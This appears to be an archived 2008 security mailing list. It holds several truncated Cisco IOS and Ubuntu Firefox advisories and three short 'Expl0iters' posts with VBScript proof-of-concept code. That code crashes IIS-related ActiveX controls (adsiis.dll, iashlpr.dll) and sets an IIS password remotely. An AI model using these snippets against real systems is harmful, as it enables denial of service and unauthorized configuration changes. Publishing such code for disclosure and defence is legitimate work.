-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS NAT Skinny Call Control Protocol Vulnerability Advisory ID: cisco-sa-20080924-sccp http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === A series of segmented Skinny Call Control Protocol (SCCP) messages may cause a Cisco IOS device that is configured with the Network Address Translation (NAT) SCCP Fragmentation Support feature to reload. Cisco has released free software updates that address this vulnerability. A workaround that mitigates this vulnerability is available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml Note: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml Affected Products = Vulnerable Products +-- This security advisory applies to all Cisco products that run Cisco IOS Software configured for NAT and that support the NAT SCCP Fragmentation Support feature. This feature was first introduced in Cisco IOS version 12.4(6)T. To verify if NAT is enabled on a Cisco IOS device log into the device and issue the command show ip nat statistics. The following example shows a device configured with NAT: Router# show ip nat statistics Total translations: 2 (0 static, 2 dynamic; 0 extended) Outside interfaces: Serial0 Inside interfaces: Ethernet1 Hits: 135 Misses: 5 Expired translations: 2 Dynamic mappings: -- Inside Source access-list 1 pool mypool refcount 2 pool mypool: netmask 255.255.255.0 start 192.168.10.1 end 192.168.10.254 type generic, total addresses 14, allocated 2 (14%), misses 0 Alternatively, you can use the show running-config | include ip nat command to verify if NAT has been enabled on the router interfaces. Note: With reference to NAT, the term "inside" refers to those networks that will be translated. Inside this domain, hosts will have addresses in one address space, while on the "outside", they will appear to have addresses in another address space when NAT is configured. The first address space is referred to as the local address space and the second is referred to as the global address space. The ip nat inside and ip nat outside interface commands must be present on the corresponding router interfaces in order for NAT to be enabled. In order to determine the software that runs on a Cisco IOS product, log in to the device and issue the show version command to display the system banner. Cisco IOS software identifies itself as "Internetwork Operating System Software" or simply "IOS." On the next line of output, the image name displays between parentheses, followed by "Version" and the Cisco IOS release name. Other Cisco devices do not have the show version command or give different output. The following example shows output from a device that runs an IOS image: router>show version Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 12.4(6)T2, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2006 by Cisco Systems, Inc. Compiled Tue 16-May-06 16:09 by kellythw Products Confirmed Not Vulnerable + Cisco IOS XR and IOS XE are not affected by this vulnerability. Cisco IOS devices not explicitly configured for NAT are not vulnerable. No
Cisco Security Advisory: Cisco IOS MPLS Forwarding Infrastructure Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS MPLS Forwarding Infrastructure Denial of Service Vulnerability Advisory ID: cisco-sa-20080924-mfi http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === Cisco IOS Software Multi Protocol Label Switching (MPLS) Forwarding Infrastructure (MFI) is vulnerable to a Denial of Service (DoS) attack from specially crafted packets. Only the MFI is affected by this vulnerability. Older Label Forwarding Information Base (LFIB) implementation, which is replaced by MFI, is not affected. Cisco has released free software updates that address this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml NOTE: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = Devices that run Cisco IOS software (including those that support Cisco IOS Software Modularity) and support MFI are affected if they are configured for MPLS. Vulnerable Products +-- A device that runs Cisco IOS software and supports MFI will have mfi_ios in the output of the show subsys command. The following example shows output from a device that supports MFI: Router#show subsys name mfi_ios Class Version mfi_ios Protocol1.000.001 Router# The following example shows output from a device that is configured for MPLS: Router#show mpls interface Interface IP Tunnel BGP Static Operational Ethernet0/0Yes (ldp)No No No Yes Router# To determine the software running on a Cisco product, log in to the device and issue the "show version" command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS". On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the IOS release name. Other Cisco devices will not have the "show version" command or will give different output. The following example identifies a Cisco product that is running Cisco IOS release 12.4(11)T2: Router#show version Cisco IOS Software,7200 Software (C7200-ADVSECURITYK9-M), Version 12.4(11)T2, RELEASE SOFTWARE (fc4) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2007 by Cisco Systems, Inc. Compiled Tue 01-May-07 04:19 by prod_rel_team Additional information on the Cisco IOS release naming conventions can be found on the document entitled "White Paper: Cisco IOS Reference Guide", which is available at http://www.cisco.com/warp/public/620/1.html Products Confirmed Not Vulnerable + Devices running Cisco IOS software versions that do not include MFI are not vulnerable. Devices that are not configured for MPLS are not vulnerable. Devices that are running Cisco IOS XR software are not vulnerable. No other Cisco products are currently known to be affected by these vulnerabilities. Details === In newer versions of Cisco IOS software, a new packet forwarding infrastructure was introduced to improve scalability and performance. This forwarding infrastructure, called MFI, is transparent to the user. MFI manages MPLS data structures used for forwarding and replaces the older implementation, Label Forwarding Information Base (LFIB). Cisco IOS MFI implementation is vulnerable to a DoS attac
Cisco Security Advisory: Cisco 10000, uBR10012, uBR7200 Series Devices IPC Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco 1, uBR10012, uBR7200 Series Devices IPC Vulnerability Advisory ID: cisco-sa-20080924-ipc http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === Cisco 1, uBR10012 and uBR7200 series devices use a User Datagram Protocol (UDP) based Inter-Process Communication (IPC) channel that is externally reachable. An attacker could exploit this vulnerability to cause a denial of service (DoS) condition on affected devices. No other platforms are affected. Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml Note: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS^ software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = Cisco 1, uBR10012 and uBR7200 series devices that are running an affected version of Cisco IOS are affected. Vulnerable Products +-- Devices that are running Cisco IOS can be identified by using the show version command. The following example shows an output taken from a Cisco 1 series device running Cisco IOS software release 12.2(31)SB10e: c10k#show version | include IOS Cisco IOS Software, 1 Software (C10K3-P11-M), Version 12.2(31)SB10e, RELEASE SOFTWARE (fc1) c10k# The following example shows an output taken from a Cisco uBR10012 series device running Cisco IOS software release 12.3(17b)BC7: ubr10k#show version | include IOS IOS (tm) 1 Software (UBR10K-K8P6U2-M), Version 12.3(17b)BC7, RELEASE SOFTWARE (fc1) ubr10k# The following example shows an output taken from a Cisco uBR7200 series device running Cisco IOS software release 12.3(21a)BC2: ubr7200#show version | include IOS IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(21a)BC2, RELEASE SOFTWARE (fc1) ubr7200# Please refer to the document entitled "White Paper: Cisco IOS Reference Guide" for additional information on the Cisco IOS release naming conventions. This document is available at the following link: http://www.cisco.com/warp/public/620/1.html Any version of Cisco IOS prior to the fixed versions listed in the Software Versions and Fixes section below is vulnerable. Products Confirmed Not Vulnerable + Cisco uBR7100 series devices are not affected. No other Cisco products are currently known to be affected by this vulnerability. Details === Cisco 1, uBR10012 and uBR7200 series devices use a UDP-based IPC channel. This channel uses addresses from the 127.0.0.0/8 range and UDP port 1975. Cisco 1, uBR10012 and uBR7200 series devices that are running an affected version of Cisco IOS will process IPC messages that are sent to UDP port 1975 from outside of the device. This behavior may be exploited by an attacker to cause a reload of the device, linecards, or both, resulting in a DoS condition. Filtering unauthorized traffic destined to 127.0.0.0/8 or UDP port 1975 will mitigate this vulnerability. This vulnerability is documented in the Cisco Bug IDs CSCsg15342 and CSCsh29217 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-3805. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is don
Cisco Security Advisory: Vulnerability in Cisco IOS While Processing SSL Packet
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Vulnerability in Cisco IOS While Processing SSL Packet Advisory ID: cisco-sa-20080924-ssl http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === A Cisco IOS device may crash while processing an SSL packet. This can happen during the termination of an SSL-based session. The offending packet is not malformed and is normally received as part of the packet exchange. Cisco has released free software updates that address this vulnerability. Aside from disabling affected services, there are no available workarounds to mitigate an exploit of this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml Note: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = Vulnerable Products +-- Devices running Cisco IOS and using SSL-based services are susceptible to this vulnerability. Some of the services that utilize SSL are: * HTTP server supporting SSL encryption (HTTPS) The following example shows a device that has the standard Cisco IOS HTTP server disabled, but the SSL-enabled Cisco IOS HTTP server enabled: Router#show running-config | include ip http no ip http server ip http secure-server Router# * SSL Virtual Private Network (SSL VPN) also known as AnyConnect VPN The following example shows a device that has the SSL VPN feature enabled: Router#show running-config | include webvpn webvpn enable webvpn Router# * Open Settlement Protocol (OSP) for Packet Telephony feature The following example shows a device that has the OSP feature enabled and uses HTTPS protocol that is vulnerable: Router#show running-config | include url url https://:443/ Router# The Cisco IOS Bug Toolkit may not accurately reflect the affected releases for this advisory. The affected releases are as follows: * 12.4(16)MR, 12.4(16)MR1, 12.4(16)MR2 * 12.4(17) To determine the version of the Cisco IOS software running on a Cisco product, log in to the device and issue the show version command to display the system banner. Cisco IOS Software will identify itself as "Internetwork Operating System Software" or simply "IOS." On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the IOS release name. Other Cisco devices will not have the show version command or will give different output. Router#show version Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version 12.4(15)T2, RELEASE SOFTWARE (fc7) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2008 by Cisco Systems, Inc. Compiled Thu 17-Jan-08 23:12 by prod_rel_team Additional information about Cisco IOS software release naming is available at the following link: http://www.cisco.com/warp/public/620/1.html Products Confirmed Not Vulnerable + No other Cisco products and Cisco IOS releases are currently known to be affected by this vulnerability. Details === This vulnerability is triggered during the termination of an SSL session. Possession of valid credentials such as a username, password or a certificate is not required. SSL protocol uses TCP as a transport protocol. The requirement of the complete TCP 3-way handshake reduces the proba
Cisco Security Advisory: Cisco IOS Software Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS Software Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability Advisory ID: cisco-sa-20080924-l2tp http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === A vulnerability exists in the Cisco IOS software implementation of Layer 2 Tunneling Protocol (L2TP), which affects limited Cisco IOS software releases. Several features enable the L2TP mgmt daemon process within Cisco IOS software, including but not limited to Layer 2 virtual private networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack Group Bidding Protocol (SGBP) and Cisco Virtual Private Dial-Up Networks (VPDN). Once this process is enabled the device is vulnerable. This vulnerability will result in a reload of the device when processing a specially crafted L2TP packet. Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Note: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml Affected Products = All devices running affected versions of 12.2 or 12.4 Cisco IOS system software and that have a vulnerable configuration are affected by this vulnerability. Vulnerable Products +-- To determine if a device is vulnerable, first confirm that the device is running an affected version of 12.2 or 12.4 Cisco IOS system software. Then check for the process L2TP mgmt daemon running on the device. To determine the software version running on a Cisco product, log in to the device and issue the show version command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS." On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the IOS release name. Other Cisco devices will not have the show version command or will give different output. The following example identifies a Cisco product that is running Cisco IOS Software Release 12.4(11)T2: Router#show version Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 12.4(11)T2, RELEASE SOFTWARE (fc4) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2007 by Cisco Systems, Inc. Compiled Tue 01-May-07 04:19 by prod_rel_team Additional information on the Cisco IOS release naming conventions can be found in the document entitled "White Paper: Cisco IOS Reference Guide," which is available at http://www.cisco.com/warp/public/620/1.html To check if the process L2TP mgmt daemon is running on a device, log into the command line interface (CLI) and issue the command show processes | include L2TP . (NOTE: The command is case sensitive.) If the output returns a line with the process name L2TP mgmt daemon, the device is vulnerable. The following example shows a device running the L2TP mgmt daemon process: Router#show processes | include L2TP 158 Mwe 62590FE44 3133322900/24000 0 L2TP mgmt daemon Router# The L2TP mgmt daemon is started by several different types of configurations that may be deployed in networks that leverage the L2TP protocol. If any of the following commands appear within a device's configuration, show running-config, then the device will have started t
Internet Information Service (adsiis.dll) activex remote DOS
""" """ :: :: :: :::: :: """ """ :: :: :::: :: .. ::""" """ :::: : :: :: :: :: :: """ """ :: :: :: :: : :: :: :: :: ::::""" """ :: :: :: : :: :: :: :: rs.ir """ """ :: """ """ """ """ # Tilte: adsiis.dll activex remote DOS # Exp0iters member (order by alphabet) .: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r] # Author: [hamedata] # E-mail: [EMAIL PROTECTED] # Location .: [Iran] # Software .: [Inernet Information Service] # Sp Tanx2 .: [ALL HACKERS] # Vulnerability: Remote DOS Exploit # Part Expl0it & Bug Codes : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sub try first_arg="expl0iters" OF=String(7188, "A") target.GetObject first_arg ,OF End Sub =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Part Contact : Contact me : [EMAIL PROTECTED] Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM
IAS Helper COM Component (iashlpr.dll) activex remote DOS
""" """ :: :: :: :::: :: """ """ :: :: :::: :: .. ::""" """ :::: : :: :: :: :: :: """ """ :: :: :: :: : :: :: :: :: ::::""" """ :: :: :: : :: :: :: :: rs.ir """ """ :: """ """ """ """ # Tilte: iashlpr.dll activex remote DOS # Exp0iters member (order by alphabet) .: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r] # Author: [hamedata] # E-mail: [EMAIL PROTECTED] # Location .: [Iran] # Software .: [IAS Helper COM Component] # Sp Tanx2 .: [ALL HACKERS] # Vulnerability: Remote DOS Exploit # Part Expl0it & Bug Codes : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sub try bad_data=-2147483647 secondarg="expl0iters" target.PutProperty bad_data ,secondarg End Sub =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Part Contact : Contact me : [EMAIL PROTECTED] Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM
Internet Information Service remote set password
""" """ :: :: :: :::: :: """ """ :: :: :::: :: .. ::""" """ :::: : :: :: :: :: :: """ """ :: :: :: :: : :: :: :: :: ::::""" """ :: :: :: : :: :: :: :: rs.ir """ """ :: """ """ """ """ # Tilte: Internet Information Service set password # Exp0iters member (order by alphabet) .: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r] # Author: [hamedata] # E-mail: [EMAIL PROTECTED] # Location .: [Iran] # Software .: [Internet Information Service] # Sp Tanx2 .: [ALL HACKERS] # Vulnerability: Remote set password # Part Expl0it & Bug Codes : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sub try iis.SetPassword "exploiters" End Sub =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Part Contact : Contact me : [EMAIL PROTECTED] Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM
[USN-645-2] Firefox vulnerabilities
=== Ubuntu Security Notice USN-645-2 September 24, 2008 firefox vulnerabilities CVE-2008-0016, CVE-2008-3835, CVE-2008-3836, CVE-2008-3837, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064, CVE-2008-4065, CVE-2008-4066, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: USN-645-1 fixed vulnerabilities in Firefox and xulrunner for Ubuntu 7.04, 7.10 and 8.04 LTS. This provides the corresponding update for Ubuntu 6.06 LTS. Original advisory details: Justin Schuh, Tom Cross and Peter Williams discovered errors in the Firefox URL parsing routines. If a user were tricked into opening a crafted hyperlink, an attacker could overflow a stack buffer and execute arbitrary code. (CVE-2008-0016) It was discovered that the same-origin check in Firefox could be bypassed. If a user were tricked into opening a malicious website, an attacker may be able to execute JavaScript in the context of a different website. (CVE-2008-3835) Several problems were discovered in the JavaScript engine. This could allow an attacker to execute scripts from page content with chrome privileges. (CVE-2008-3836) Paul Nickerson discovered Firefox did not properly process mouse click events. If a user were tricked into opening a malicious web page, an attacker could move the content window, which could potentially be used to force a user to perform unintended drag and drop operations. (CVE-2008-3837) Several problems were discovered in the browser engine. This could allow an attacker to execute code with chrome privileges. (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060) Drew Yao, David Maciejak and other Mozilla developers found several problems in the browser engine of Firefox. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064) Dave Reed discovered a flaw in the JavaScript parsing code when processing certain BOM characters. An attacker could exploit this to bypass script filters and perform cross-site scripting attacks. (CVE-2008-4065) Gareth Heyes discovered a flaw in the HTML parser of Firefox. If a user were tricked into opening a malicious web page, an attacker could bypass script filtering and perform cross-site scripting attacks. (CVE-2008-4066) Boris Zbarsky and Georgi Guninski independently discovered flaws in the resource: protocol. An attacker could exploit this to perform directory traversal, read information about the system, and prompt the user to save information in a file. (CVE-2008-4067, CVE-2008-4068) Billy Hoffman discovered a problem in the XBM decoder. If a user were tricked into opening a malicious web page or XBM file, an attacker may be able to cause a denial of service via application crash. (CVE-2008-4069) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3.diff.gz Size/MD5: 184879 85df86b82d3b0791f1152f7048e80c59 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3.dsc Size/MD5: 1800 958f213fa0b3290fd34ff151fac0f11e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614e.orig.tar.gz Size/MD5: 47543282 53d4cf0a63c82ad875208a660dfcefd5 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb Size/MD5:53526 a27b80846d4996481aa3c9b13ed6e0d4 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb Size/MD5:52640 b400a1eb1b12d75503cece2b8f9941c3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb Size/MD5: 47643106 bb2d5e1d0d251044f0dffbc53799af52 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_amd64.deb Size/MD5: 2858414 52e37bdb64081a8d5b05abedd62464a7 http://security.ubuntu.com/ubuntu/pool/mai
[USN-645-1] Firefox and xulrunner vulnerabilities
=== Ubuntu Security Notice USN-645-1 September 24, 2008 firefox, firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2008-0016, CVE-2008-3835, CVE-2008-3836, CVE-2008-3837, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064, CVE-2008-4065, CVE-2008-4066, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069 === A security issue affects the following Ubuntu releases: Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.04: firefox 2.0.0.17+0nobinonly-0ubuntu0.7.4 Ubuntu 7.10: firefox 2.0.0.17+1nobinonly-0ubuntu0.7.10 Ubuntu 8.04 LTS: firefox-3.0 3.0.2+build6+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.2+build6+nobinonly-0ubuntu0.8.04.1 After a standard system upgrade you need to restart Firefox and any applications that use xulrunner, such as Epiphany, to effect the necessary changes. Details follow: Justin Schuh, Tom Cross and Peter Williams discovered errors in the Firefox URL parsing routines. If a user were tricked into opening a crafted hyperlink, an attacker could overflow a stack buffer and execute arbitrary code. (CVE-2008-0016) It was discovered that the same-origin check in Firefox could be bypassed. If a user were tricked into opening a malicious website, an attacker may be able to execute JavaScript in the context of a different website. (CVE-2008-3835) Several problems were discovered in the JavaScript engine. This could allow an attacker to execute scripts from page content with chrome privileges. (CVE-2008-3836) Paul Nickerson discovered Firefox did not properly process mouse click events. If a user were tricked into opening a malicious web page, an attacker could move the content window, which could potentially be used to force a user to perform unintended drag and drop operations. (CVE-2008-3837) Several problems were discovered in the browser engine. This could allow an attacker to execute code with chrome privileges. (CVE-2008-4058, CVE-2008-4059, CVE-2008-4060) Drew Yao, David Maciejak and other Mozilla developers found several problems in the browser engine of Firefox. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4061, CVE-2008-4062, CVE-2008-4063, CVE-2008-4064) Dave Reed discovered a flaw in the JavaScript parsing code when processing certain BOM characters. An attacker could exploit this to bypass script filters and perform cross-site scripting attacks. (CVE-2008-4065) Gareth Heyes discovered a flaw in the HTML parser of Firefox. If a user were tricked into opening a malicious web page, an attacker could bypass script filtering and perform cross-site scripting attacks. (CVE-2008-4066) Boris Zbarsky and Georgi Guninski independently discovered flaws in the resource: protocol. An attacker could exploit this to perform directory traversal, read information about the system, and prompt the user to save information in a file. (CVE-2008-4067, CVE-2008-4068) Billy Hoffman discovered a problem in the XBM decoder. If a user were tricked into opening a malicious web page or XBM file, an attacker may be able to cause a denial of service via application crash. (CVE-2008-4069) Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4.diff.gz Size/MD5: 316696 fcc877d67c4c479221bbf3c4a3d7eb6d 